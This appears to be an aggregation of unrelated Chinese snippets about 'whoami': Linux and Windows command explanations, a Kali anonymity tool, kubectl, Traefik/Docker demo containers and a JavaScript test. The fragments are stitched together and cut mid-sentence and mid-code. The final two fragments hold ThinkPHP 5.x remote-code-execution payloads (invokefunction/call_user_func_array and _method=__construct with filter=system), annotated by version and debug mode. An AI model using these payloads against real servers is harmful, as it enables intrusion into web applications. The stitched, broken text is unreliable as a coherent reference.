文章目录 1.命令简介 2.命令格式 3.选项说明 4.常用示例 参考文献 1.命令简介 whoami 打印当前用户名。 whoami 打印与当前有效用户 ID 关联的用户名。 2.命令格式 whoami [<OPTION>]... 3.选项说明 --help 显示此帮助信息并退出。 --version 显示版本信息并退出。 4.常用示例 查询当前登录的用户名。 whoami root 或者 id -un root ---- 参考文献 whoami(1) - Linux manual page - man7.org
在这篇文章中,我们将会覆盖whoami命令。 就像名字显示的那样,whoami命令打印出当前用户的用户名。换句话说,它显示当前登录用户的名字。 如何使用 whoami 命令 whoami 的命令语法如下: whoami [OPTION] 为了显示当前系统登录用户的用户名,不带任何选项引入这个命令。 whoami 类似的输出结果将在屏幕上展示,显示当前输入命令的用户的用户名: linuxize whoami可以用在 shell 脚本中,用来检测运行脚本的用户的用户名。 whoami 在使用su切换到另外一个用户时,whoami命令也可以很方便的用来验证用户名。 whoami 不接受任何的参数。 whoami [OPTION] 使用id命令可以获得更多关于用户的信息。 环境变量$USER包含了当前登录用户的用户名: echo $USER 总结 whoami命令代表“Who am I?” 。
五条命令让你代替Whoami CMD: echo %USERNAME% echo %USERDOMAIN%\%USERNAME% net user %USERNAME% wmic computersystem
CentOS7-命令-查看当前用户 whoami
关于Kali-Whoami Whoami工具的目的是让您在Kali-linux上尽可能地保持匿名活动,该工具提供了一个用户友好且易于使用的简单界面,并遵循两种不同的路径以确保最高级别的匿名性。 因此,我们需要先安装并配置好Whoami所需的依赖组件,我们可以直接运行下列命令完成准备工作: sudo apt update && sudo apt install tar tor curl python3 接下来,安装makefile sudo make install 完成上述操作之后,我们就可以开始使用Whoami了。 工具使用 完成工具的安装之后,我们需要在系统的搜索栏中搜索“Kali Whoami”,或直接在命令行终端中运行下列命令: sudo kali-whoami --help 此时,你将会看到如下所示的提示界面 : [+] Usage : sudo kali-whoami [option] --start : It will make backups and start the program.
终端大冒险_终端命令_ls_pwd_whoami 回忆 上次 了解基本环境简称含义CLI命令行界面GUI图形用户界面在 CLI 中 通过终端 连接 远程服务器的 壳(shell)控制 云端的核 胡乱敲击 使用面部在键盘上横滚添加图片注释,不超过 140 字(可选)shell环境报错了添加图片注释,不超过 140 字(可选)红颜色意味着不能执行终端命令whoami 终端上 依次按下 wh 从绿变红添加图片注释,不超过 140 字(可选)终端 显示wh是红色的 意味着没有wh这条命令再按下o 显示绿色 说明 有who这条命令继续按下ami 根据颜色 可以判断 是否有相应的命令变绿 whoami 文字变绿 说明 有whoami 这条命令添加图片注释,不超过 140 字(可选)这条命令发出绿光 Green Light I'm searching for youAlways 不会却步喔真爱 不会结束Green Light in my life执行命令 回车 执行whoami命令 显示出当前登录名whoami 就是 我是谁你 问 服务器我是谁 服务器 就告诉 你 你的用户名这叫有来有回添加图片注释
1 whoami 查看当前登录用户 useradd zhang 增加用户 passwd zhang su - zhang 切换用户 echo 123456
这样就可以简单的通过增加一个 kubectl auth whoami 的命令,来了解当前用户的相关信息了。 同时,本次也在 kubectl 中添加了 kubectl alpha auth whoami 子命令,可直接查看当前用户的相关属性信息。
whoami 打印当前有效的用户ID对应的名称。 概要 whoami [OPTION]... 主要用途 打印当前有效的用户ID对应的名称。 选项 --help: 显示帮助信息并退出。 例子 [root@localhost ~]# whoami root 注意 该命令等价于 id -un 。 注意区分 whoami 和 logname 这两个命令;比如我们以用户 root 打开的终端,然后切换到了用户 user2。 此时, whoami 返回的是当前用户 user2, logname 返回的是 root,大家可以自行实践验证一下。 该命令是GNU coreutils包中的命令,相关的帮助信息请查看 man -s 1 whoami ,info coreutils 'whoami invocation'。
这个时候只有管理员才能操作,所以要获取管理员权限 sudo -s可以直接切换到root用户,但是不建议这样做,可能会不小心删除一些东西,如果要退出,执行exit命令 也可以在某个命令前面加上sudo,这样比较安全 whoami
然后可以测试以下应用连通性,如下: # kubectl -n whoami exec whoami-client -- curl -s whoami.whoami.svc.cluster.local Hostname Host: whoami.whoami.svc.cluster.local User-Agent: curl/7.64.0 Accept: */* # kubectl -n whoami exec -ti whoami-client -- nc whoami-tcp.whoami.svc.cluster.local 8080 my data Received: my data Received: 比如之前访问方式如下: kubectl -n whoami exec whoami-client -- curl -s whoami.whoami.svc.cluster.local 加了traefik mesh之后,即为: kubectl -n whoami exec whoami-client -- curl -s whoami.whoami.traefik.mesh 当然之前的访问方式依然存在
/`) # 路由匹配器,匹配 http://master/whoami/ kind: Rule services: # 代理服务 - name: whoami port : name: whoami labels: app: whoami spec: replicas: 2 selector: matchLabels: app /`) # 路由匹配器,匹配 http://master/whoami/ middlewares: # 使用中间件 - name: whoami-auth kind: Rule --- kind: Deployment apiVersion: apps/v1 metadata: name: whoami labels: app: whoami spec: app: whoami spec: containers: - name: whoami image: containous/whoami
(); var ninja2 = { whoAmI: ninja1.whoAmI }; assert(ninja1.whoAmI() === ninja1, "ninja1 here?") .whoAmI() === ninja1, "ninja1.whoAmI() === ninja1"); assert(ninja2.whoAmI() === ninja2, "ninja2.whoAmI .whoAmI() === ninja1, "ninja2.whoAmI() === ninja1"); assert(ninja1.whoAmI === ninja2.whoAmI, "ninja1 } assert(p1.whoAmI() === p1, "p1.whoAmI() === p1"); assert(p2.whoAmI() === p2, "p2.whoAmI() , "p2.whoAmI() === p1"); assert(p1.whoAmI === p2.whoAmI, "p1.whoAmI === p2.whoAmI"); </script
docker安装及最简化demo通过如下yml文件启动traefik及一个whoami容器,可以通过host,whoami.test来访问version: "2.2"services: traefik =Host(`whoami.test`)" # 通过 Host 规则访问 - "traefik.http.routers.whoami.entrypoints=web" 我们可以通过继续部署一个whoami,通过如下配置:version: "2.2" whoami2: image: traefik/whoami labels: - "traefik.enable =true" - "traefik.http.routers.whoami2.rule=Host(`whoami2.test`)" # 通过 Host 规则访问 - "traefik.http.routers.whoami2 : app: whoami部署kubectl apply -f whoami.yamlkubectl apply -f whoami-service.yaml创建一个IngressRoute# whoami-ingressroute.yamlapiVersion
Traefik来检测新服务并为你创建一个路由 # 创建一个新服务 $ cat test-service.yaml version: '3' services: whoami: image: containous/whoami labels: - "traefik.http.routers.whoami.rule=Host(`whoami.docker.localhost `)" # 创建服务 $ docker-compose -f test-service.yaml up -d whoami Pulling whoami (containous/whoami:).. . latest: Pulling from containous/whoami 6f3614cb05a5: Pull complete # 查看新创建的服务 $ docker-compose -f @docker": { "rule": "Host(`whoami.docker.localhost`)", "service": "whoami-20190927
jwilder/whoami #查看service 里面的服务 docker service ls #查看whoami的信息 docker service ps whoami #因为service ps whoami 在manager上运行,直接在manager查看ps下 docker ps [b1nq3w188q.png] [mvk3t3fqoo.png] #访问下本地manager的whoami [daqm4r90ut.png] [h0t2bvlhmq.png] ping whoami ip地址是10.0.0.247 测试whoami的ip是否发生变化在manager下进行scale 扩展为2 个,查看到一个在worker2上边,并在worker2的ps上可以查看到whoami的运行,尝试继续ping whoami,结果ip不发生变化。 #manager机器上进行扩展 docker service scale whoami=2 #worker2 上运行 查看whoami 是否存在 docker ps #worker1 上ping whoami
创建一个service,这个service 使用whoami,这个image,这个image的作用,就是访问后,返回当前访问的主机名称 docker service create --name whoami ps whoami #因为service ps whoami 在manager上运行,直接在manager查看ps下 docker ps ? whoami的运行,尝试继续ping whoami,结果ip不发生变化。 #manager机器上进行扩展 docker service scale whoami=2 #worker2 上运行 查看whoami 是否存在 docker ps #worker1 上ping whoami 发现ip没有发生变化10.0.0.247 ping whoami ?
测试 下面我们安装 whoami 服务来进行测试,直接使用下面的资源清单创建对应的服务即可: # 01-whoami.yaml --- kind: Deployment apiVersion: apps /v1 metadata: name: whoami spec: replicas: 2 selector: matchLabels: app: whoami template : metadata: labels: app: whoami spec: containers: - name: whoami ,你会看到典型的 whoami 输出。 curl -H "Host: whoami" http://localhost/foo Hostname: whoami-9cdc57b6d-pfpxs IP: 127.0.0.1 IP: ::1 IP
s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami ? s=index/\think\Request/input&filter=system&data=whoami ? s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami ? get&server[REQUEST_METHOD]=whoami _method=__construct&filter[]=system&method=get&get[]=whoami || _method =__construct&filter=system&method=GET&route[]=whoami
RCE,debug=true时5.0.21~22 # data={"_method":"__construct","filter":"system","server[REQUEST_METHOD]":"whoami "} #debug=false时5.0.1~12,debug=true时5.0.1~20 # data="s=whoami&_method=__construct&method=POST&filter s=captcha" # data="_method=__construct&filter[]=system&method=get&get[]=whoami" #debug=false时无RCE,debug s=captcha" # data="_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=whoami" # debug s=captcha" # data="_method=__construct&filter=system&method=get&get[]=whoami" #debug=false时5.0.1~12,